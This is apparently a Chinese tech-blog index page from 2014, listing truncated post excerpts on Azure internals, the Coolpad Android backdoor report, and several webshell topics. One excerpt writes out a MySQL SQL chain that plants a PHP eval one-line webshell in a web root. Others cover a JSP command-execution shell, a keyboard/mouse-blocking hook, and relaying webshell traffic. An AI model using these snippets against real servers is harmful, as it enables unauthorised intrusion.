对Microsoft Azure 网站而言, 用户能控制的主要是自身应用的数据和文件, 而服务器系统或其他更底层的配置对我们来说像个黑盒。 这本是基于PAAS的设计,因为这样我们可以将重点放在应用上而不用担心底层平台。也许有时候难免有些好奇:要是想多了解一些Microsoft Azure网站所在的“...
分类:
Web程序 时间:
2014-12-30 13:08:57
阅读次数:
132
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:
数据库 时间:
2014-12-24 06:30:25
阅读次数:
237
(1)屏蔽本程序的鼠标信息和特定按键信息。设置后门按键F2可退出程序。HHOOKg_hKeyBoard;
HHOOKg_hMouse;
LRESULTCALLBACKMouseProc(
_In_intnCode,
_In_WPARAMwParam,
_In_LPARAMlParam
)
{
return1;//屏蔽鼠标消息
}
LRESULTCALLBACKKeyboardProc(
_In_intcode,
_In..
分类:
其他好文 时间:
2014-12-23 06:47:37
阅读次数:
182
摘要 : 酷派被国外安全研究公司Palo Alto发现在用户的手机里内置后门恶意软件,通过推送伪造OTA软件升级来安装用户不想要的应用,国内白帽子黑客发现酷派一个在线管理平台专门负责往用户的手机上悄悄推送和安装应用程序文/柳华芳北京的夜晚,黑漆漆的一片,黑夜给了我们黑色的眼睛,我们去抓住黑手,看到酷...
分类:
移动开发 时间:
2014-12-20 18:08:30
阅读次数:
209
隐私问题被曝光得越来越多,随着物联网的发展,只会变得越来越严重,不过从当前看来 ,国人对隐私的重视度还远没有国外,期待加强对隐私的保护策略。 转自:http://www.freebuf.com/news/54486.html 网络安全公司Palo Alto披露,酷派安卓设备上存在搜集用户隐私数据的恶...
分类:
移动开发 时间:
2014-12-20 18:03:54
阅读次数:
193
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。1.利用404页面隐藏PHP小马: 1 2 3 404 Not Found 4 5 Not Found ...
分类:
Web程序 时间:
2014-12-20 16:51:04
阅读次数:
301
转自 http://zone.wooyun.org/content/17356 园长一:执行系统命令:无回显执行系统命令:请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:").....
分类:
Web程序 时间:
2014-12-18 15:06:04
阅读次数:
430
对几款网络抓包工具的评测 by 拉登哥哥
最近在写个CMD远控 写着写着 想在服务端上做点手脚
都知道杀软误报 特别是黑软大部分都报毒 但实际上是正常的
对此可能部分人并不装杀软 基本上靠自己分析软件是否安全
1 低级点的 用相关工具 检测不能真的完全保证程序无毒 也没啥技术含量
原因是 可能你正在检测时 后门没激活(比如 我设置晚上12点才向外连接等)
你在白天或其...
分类:
其他好文 时间:
2014-12-16 11:46:45
阅读次数:
173
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<formmethod="post">
<inputtype=textname="cmd"size=60>..
分类:
Web程序 时间:
2014-12-15 06:37:08
阅读次数:
1439
通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言
<?php
$webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址
$temp=$_POST;
$data = $temp;
$data = http_build_query($data);
$...
分类:
Web程序 时间:
2014-11-30 00:30:51
阅读次数:
659